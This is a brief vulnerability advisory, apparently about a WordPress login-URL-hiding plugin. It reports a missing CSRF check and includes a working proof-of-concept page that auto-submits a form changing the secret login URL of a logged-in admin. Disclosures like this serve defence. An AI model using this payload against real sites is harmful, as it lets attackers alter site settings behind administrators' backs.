The plugin does not have CSRF check in place when updating the secret login URL, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
<input type="text" name="rwl_page" value="sesame-open">
</form>
<script>
document.getElementById("test").submit();
</script>